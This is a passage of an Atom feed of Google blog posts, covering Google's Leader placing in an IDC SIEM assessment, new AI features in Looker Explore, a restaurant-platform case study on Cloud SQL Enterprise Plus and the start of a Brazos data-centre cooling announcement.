&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations that seek to work with a globally capable security leader with strong threat intelligence capabilities and a holistic approach to security operations should consider Google. To learn more about our capabilities and why Google has been named a Leader, read a complimentary excerpt of the &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/idc-siem-marketscape-2026"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2026 IDC MarketScape for Worldwide SIEM Vendor Assessment here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/google-named-a-leader-in-idc-marketscape-siem-2026-vendor-assessment" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T17:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/from-pixels-to-planning-earth-ai-for-nature-restoration</id>
    <title>From pixels to planning: Earth AI for nature restoration</title>
    <updated>2026-06-16T17:30:00+00:00</updated>
    <content type="html">Climate &amp; Sustainability</content>
    <link href="https://research.google/blog/from-pixels-to-planning-earth-ai-for-nature-restoration" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-16T17:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/google-named-a-leader-in-idc-marketscape-siem-2026-vendor-assessment/</id>
    <title>Google named a Leader in IDC MarketScape SIEM 2026 Vendor Assessment</title>
    <updated>2026-06-16T17:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security operations teams are under immense pressure to defend against adversaries who use AI to act with unprecedented speed, scale, and sophistication. To navigate these moments, secure mission-critical workloads, and build confident defense programs, organizations rely on modern security information and event management (SIEM) systems as the backbone of their security operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are proud to announce that Google has been named a Leader in the 2026 IDC MarketScape for Worldwide SIEM Vendor Assessment (#US54126826, June 2026). We believe this recognition reflects our sustained investment and innovation in Google Security Operations, bringing together Mandiant's frontline expertise, comprehensive automation, and advanced AI agents to empower defenders.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to the report, Google was recognized for several key strengths, including:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Alert Triage and Investigation agent collects evidence, runs correlated searches, and produces a transparent verdict, reducing the security analyst workload. The additional agents announced at Google Cloud Next extend agentic workflows beyond triage into proactive hunting and rule generation. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google designs the silicon, runs the infrastructure, develops the Gemini foundation models through DeepMind, and encodes its internal security expertise into agent evaluation loops. Vertical AI integration supports unit economics that would be difficult to achieve through third-party model APIs and gives Google tighter control over the iteration cycle that improves agent accuracy on security-specific tasks. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Curated detection content authored by Mandiant analysts is mapped to MITRE ATT&amp;amp;CK and refreshed on a regular cadence. Customers report that the higher-tier curated rule sets deliver useful detections out of the box. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Search performance over large data volumes is a consistently cited technical strength. The unified data lake, combined with all-time UDM search and multistage search with cross joins, allows analysts to query the full retention period without the performance degradation common on legacy on-premises platforms.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_ZZjbofo.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology and service suppliers in a given market.  The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market and business execution in the short-term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral or minus next to the vendor name.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Security Operations, powered by AI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Speed and accuracy are crucial in threat detection and incident response. Google continues to drive security operations innovation to help defenders work smarter, not harder. By deeply embedding Gemini in Google Security Operations, we enable analysts to perform complex natural language searches across vast amounts of security telemetry. We have also added agents such as the Triage and Investigation agent that enhance analyst productivity by accelerating event summarization, dynamically generating detection rules, and building automated response playbooks in seconds instead of hours.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“With Google Security Operations, we’re able to take in large volumes of telemetry, introduce AI into our workflows, and we saw a 97% reduction in alerts,” Daniel Peterpaul, VP, Information Security, Sunrun.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Unparalleled access to threat intelligence&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A modern SIEM must go beyond data aggregation; it requires context. Google Threat Intelligence combines Mandiant's frontline expertise, the global reach of the VirusTotal community, and the unparalleled visibility of Google's services and devices into Google Security Operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our applied threat intelligence capability enables security teams to spend less time on manual monitoring and more time contextualizing alerts for better decision-making. Through services like &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-mandiant-hunt-for-chronicle"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Mandiant Hunt&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we integrate our proactive experts directly into Google Security Operations to help defenders search for undetected attacks and adversary tactics, techniques, and procedures (TTPs) before they escalate.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Ensuring operational resilience for global enterprises&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations around the globe are making significant leaps in both the technology they use and the way they think about security operations by partnering with Google. The ability to stitch together security telemetry and threat intelligence gives organizations visibility to full-service recovery and holistic security transformation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Our engineers in the SOC are working on high fidelity, true positives only. So, you've got a high fidelity true positive that's fired, and frankly, you want that alarm then to be enriched with as much contextual information as possible, that's the shift that Gemini in SecOps will allow us to get to. We want AI to work in service of our people, and then we want people to use their human brilliance, creativity, big picture problem-solving to think about attack paths and predicting them, and really making our environment a hard target,” Matt Rowe, chief security officer, Lloyds Banking Group.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Take the next step in advancing your cyber defenses&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations that seek to work with a globally capable security leader with strong threat intelligence capabilities and a holistic approach to security operations should consider Google.To learn more about our capabilities and why Google has been named a Leader, read a complimentary excerpt of the &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/idc-siem-marketscape-2026"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2026 IDC MarketScape for Worldwide SIEM Vendor Assessment here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/google-named-a-leader-in-idc-marketscape-siem-2026-vendor-assessment/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T17:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/from-pixels-to-planning-earth-ai-for-nature-restoration/</id>
    <title>From pixels to planning: Earth AI for nature restoration</title>
    <updated>2026-06-16T17:30:00+00:00</updated>
    <content type="html">Climate &amp; Sustainability</content>
    <link href="https://research.google/blog/from-pixels-to-planning-earth-ai-for-nature-restoration/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-16T17:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/google-play/book-insights/</id>
    <title>3 ways Book insights helps you get more from your reading</title>
    <updated>2026-06-16T17:00:00+00:00</updated>
    <content type="html">A woman looks at a tablet. A play button icon is positioned around her. A lightbulb and spark icon also is in the image.</content>
    <link href="https://blog.google/products-and-platforms/platforms/google-play/book-insights/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/xr-ar/awe-2026/</id>
    <title>Reservations are open for XREAL AURA — plus, see more news from AWE 2026.</title>
    <updated>2026-06-16T17:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/us_ggl_android_xr_xreal_aura_sh.max-600x600.format-webp.webp" /&gt;Reservations are now open for XREAL AURA, XREAL's first tethered XR glasses built with Google for Android XR.</content>
    <link href="https://blog.google/innovation-and-ai/technology/xr-ar/awe-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/business-intelligence/looker-explore-ai-and-interface-updates/</id>
    <title>Introducing new Explores and Merge Queries in Looker</title>
    <updated>2026-06-16T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A key goal for many enterprises in the AI era is to empower their employees to uncover actionable data insights on their own. To help, we are evolving &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/creating-and-editing-explores"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Looker Explore&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with a streamlined interface and integrated AI, so every usey can confidently turn data into a clear path to action.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;A team of AI assistants &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At the heart of the new Explore release is a suite of AI capabilities that guides users from their very first click with new insight and expression assistants.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;AI-assisted Quick Start&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are virtually eliminating the cold start from an empty canvas. If the data modeler hasn't built predefined &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/quick-starts"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Quick Starts&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Looker automatically generates a query for the user, tapping into Google’s latest Gemini models to generate ad hoc Quick Starts that can help users dive deep into the data, beyond visible fields, and surface potential questions the data can tackle.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_NCcB7O1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The new Explore interface in Looker&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;Insight Assistant&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Users can now prompt Looker Explores in natural language to modify data tables and visualizations. The Insight Assistant uses the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/data-agents/conversational-analytics-api/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to identify relevant fields, apply filters, sort data, and construct the data table. We expect this feature to be a significant time-saver that can provide a rapid starting point for complex analysis.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2_l7tAi1b.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;You can ask questions in natural language to update data tables in Looker&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;Expression Assistant&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Users can also use natural language to describe their custom calculation, and Looker will automatically fill in the appropriate syntax, without having to learn Looker Expression (Lexp) syntax. Users can also re-prompt the assistant to iterate on custom field expressions.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;AI-generated Explore summary&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If a user-generated description does not exist for an Explore, Looker will provide an AI-generated summary, to help data analysts rapidly gain familiarity.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;An intuitive, modernized UI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to these new assistants, we’ve updated the Looker user interface to be more modern and polished. There, you’ll find:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;A customizable workspace:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The new interface features a resizable field picker pane, with more easily readable long field names.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data table contextual menus:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Looker now offers powerful functionality right in the data table. Users can access quick menus on columns to switch data granularities, apply filters like 'IS NOT BLANK' or 'IS NOT NULL', and instantly add complex table calculations like '% of column' or 'running total'.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Visual pivots: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Users will soon be able to drag and drop fields into a panel to pivot data into columns, rows, and aggregated values. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Connect data with redesigned merge queries&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_YtMnTxW.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Looker’s new interface to quickly join modeled data&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition, we redesigned Looker Explore’s &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/merged-results"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Merge Query workflow&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with a unified, in-window architecture that includes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;A dynamic three-panel interface:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The new design maintains context beautifully by displaying three simultaneous panels: a "configure joins" list on the left, a dynamic field picker in the middle, and your data preview/visualization on the right. You can edit a source query without losing the context of the overarching join configuration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Smart join suggestions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The new panel automatically suggests optimal join fields, such as state and month, and shows the combined fields.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Instant query linking:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If you have an existing query you want to use, you can paste a prebuilt query URL to start a join.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Expanded row limits:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We've increased the default row limit for non-BigQuery sources to 50,000 rows.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By pairing conversational AI with a dramatically simplified user interface, Looker’s new Explore experience gives your business users the tools they need to investigate their data with confidence. Reach out to your Looker administrator today to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/new-explore-experience-overview#enabling_the_new_explore_and_merge_query_experience"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;enable&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; this feature. For more information, click &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/new-explore-experience-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for detailed documentation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/business-intelligence/looker-explore-ai-and-interface-updates/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/how-atlas-scales-hundreds-of-cloud-sql-databases/</id>
    <title>How Atlas scales hundreds of merchant databases with Cloud SQL Enterprise Plus edition</title>
    <updated>2026-06-16T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://www.atlas.kitchen/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Atlas&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is building the operating system for restaurants. Online storefronts, point of sale, third-party logistics, food platform integrations, customer loyalty, and AI tools represent everything a restaurant needs to start, run, and grow. We work with brands like SaladStop, Killiney, Haidilao, Raffles Hotel, Lo and Behold Group and the Les Amis Group in Singapore, helping merchants increase basket sizes, grow sales, and reduce operational costs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Every merchant on Atlas gets their own dedicated &lt;/span&gt;&lt;a href="https://cloud.google.com/sql/postgresql"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; database. Restaurants are very different from each other. A single-outlet cafe and a multi-outlet chain should not look the same underneath. Isolated databases give us full data separation, predictable performance even during peak lunch and dinner rushes, and the flexibility to scale, tune, or migrate each merchant independently. As Atlas grows, the number of databases grows with us.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge: Scaling beyond standard&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We started on the standard Cloud SQL Enterprise edition. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;It was a solid foundation&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, but as we onboarded more merchants and shipped more features, the operational layer &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;required to manage our databases became a bottleneck.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We were managing connection pooling as a separate layer, which meant more services to run, secure, and monitor. When a query caused a CPU spike, we needed to know exactly what happened and which merchant triggered it, but we were spending too much time reconstructing problems from limited signals. With a lean team and no dedicated database engineers, every extra component multiplied the maintenance load.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The shift to Enterprise Plus edition&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When we needed to provision new database instances, the Google Cloud team introduced us to Cloud SQL Enterprise Plus edition. We were already asking ourselves how much more operational overhead this was going to add, and what stood out was that Enterprise Plus edition removed whole categories of work we would otherwise have to own.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed connection pooling:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Now built directly into Cloud SQL, we no longer run pooling as a separate layer. This means fewer moving parts, less to maintain, and a smaller security surface area.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Query insights:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This was the most impactful feature for our needs. We can now see exactly which queries are expensive and which merchant is triggering them. It turns performance tuning from guesswork into something concrete and actionable. For a platform running hundreds of databases, this visibility is a "superpower."&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data cache:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This keeps read performance consistent even as merchant datasets grow. Since restaurants generate more data every day, the data layer needs to stay fast as that complexity compounds.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Near-zero downtime scaling:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We can now scale instances as merchants grow without disrupting service during off-peak hours.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;After seeing the results on the new instance, we migrated all our existing databases to Enterprise Plus edition as well.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The impact: Focus on innovation, not plumbing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Atlas today powers thousands of restaurant outlets, processes tens of thousands orders daily using hundreds of managed databases. The biggest change is where engineering time goes. We spend 30% less time on database operations and more time building products. Merchant onboarding got simpler because a new merchant is provisioned in seconds with a ready-to-use managed database. We are much more proactive on performance now, catching and fixing issues before they reach merchants. Day to day, we are not thinking about database plumbing. We are thinking about how to serve merchants better and that has allowed Atlas to grow 200% to 300% year over year.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Looking ahead: An AI-first future&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are investing deeply in AI, both internally and externally. Internally, we have gone all in on agentic engineering through AI-assisted development workflows that let a lean team build, review, and ship code significantly faster. Externally, we are building AI-powered tools that help restaurant operators make better decisions and act on them. We have a lot of experimental ideas on the roadmap, including new product surfaces and new ways to help restaurants grow. The thing that gives us confidence to move fast on all of this is that the foundational layer, Cloud SQL and &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Kubernetes Engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (GKE), is battle-tested and does not get in the way.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud handles the infrastructure complexity. Atlas stays focused on building the best tools for restaurants.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud SQL Enterprise Plus gave us a database architecture that is flexible, observable, and easy to scale. We are not thinking about infrastructure anymore, we are thinking about our merchants. As we go deeper on AI and continue growing the platform, Google Cloud gives us the confidence to move fast without worrying about what is underneath. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Ready to scale your database architecture?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Don't let infrastructure bottlenecks slow down your innovation. Whether you are managing tens or hundreds of databases, see how Google Cloud SQL can streamline your operations, enhance observability, and give your engineering team the freedom to focus on what matters most.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/sql/docs/mysql/editions-intro"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Explore Cloud SQL Enterprise Plus edition today&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Sign up to &lt;/span&gt;&lt;a href="https://console.cloud.google.com/freetrial?redirectPath=/sql"&gt;&lt;span style="vertical-align: baseline;"&gt;try Cloud SQL for free&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/how-atlas-scales-hundreds-of-cloud-sql-databases/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/systems/brazos-liquid-cooling-system-for-air-cooled-data-centers/</id>
    <title>Introducing Brazos: Bringing liquid cooling to air-cooled data centers</title>
    <updated>2026-06-16T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Next-generation artificial intelligence (AI) and high-performance computing (HPC) chips routinely exceed 1000 W Thermal Design Power (TDP). Simply put, standard air cooling cannot manage these extreme heat loads. The alternative — retrofitting entire data center facilities with chilled water loops — requires extensive amounts of capital and time. To solve this problem, Google developed Brazos, a rack-mounted, closed-loop liquid-to-air cooling system that lets you deploy high-density, liquid-cooled equipment inside existing air-cooled environments. Brazos is generally available, and our manufacturing suppliers are ready to engage the broader industry to market and produce the Google Brazos design.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data center facility updates can take months. Brazos breaks with this by allowing simple, one-rack-at-a-time installations. By separating the internal-to-IT liquid loop from the facility water supply, Brazos delivers high-performance liquid cooling with the operational simplicity of standard air systems.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_qDK9NzQ.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
